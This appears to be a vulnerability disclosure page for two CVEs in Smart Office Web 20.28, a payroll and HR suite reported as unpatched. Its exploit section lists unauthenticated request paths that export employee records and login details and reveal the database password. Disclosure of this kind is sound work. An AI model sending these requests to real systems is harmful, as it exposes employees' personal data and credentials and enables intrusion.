Headline
CVE-2022-47076: Smart Office Suite- Unauthenticated Data Ex – CVEWalkthrough
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to view sensitive information via DisplayParallelLogData.aspx.
Vulnerable Software: Smart Office Web
Vulnerability: Unauthenticated Data Export and Database Password Disclosure
Affected Version: 20.28
Fixed Version: No Fix Available
Vendor Homepage: https://smartofficepayroll.com/
CVE: CVE-2022-47075 and CVE-2022-47076
CVE Author: Tejas Nitin Pingulkar
Exploit Available: POC Available
About Affected Software
Meant for companies with a presence in multiple locations and usage is required at multiple places. Also suitable for those companies who would like to maintain their data at a centralized location and in their own premises.
Features like Employee Self Service and Mobile, are more beneficial in this setup since these can be accessed from anywhere and anytime, enabling efficiency and real time solutions.
Benefit – Data can be centralized, management becomes easier, better control over permission and data, and Can be accessed from any time and anywhere.
Exploit
To exploit use the following
To Export Employee Details
[IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails
Please refer Image 1 and 2 In POC Section
To Export Reporting Manager
[IP]:[port]/ExportReportingManager.aspx
Please refer Image 3 and 4 In POC Section
To Export Employee Other Details
[IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails
Please refer Image 5 and 6 In POC Section
To export Employee Login Details
[IP]:[port]/ExportEmployeeLoginDetails.aspx
Please refer Image 7 and 8 In POC Section
CVE-2022-47076 Database Password Disclosure
To get a database password use
[IP]:[PORT]/DisplayParallelLogData.aspx
Please refer Image 9 In POC Section
POC:
CVE-2022-47076
Related news
Smart Office Web version 20.28 suffers from information disclosure due to an insecure direct object reference vulnerability.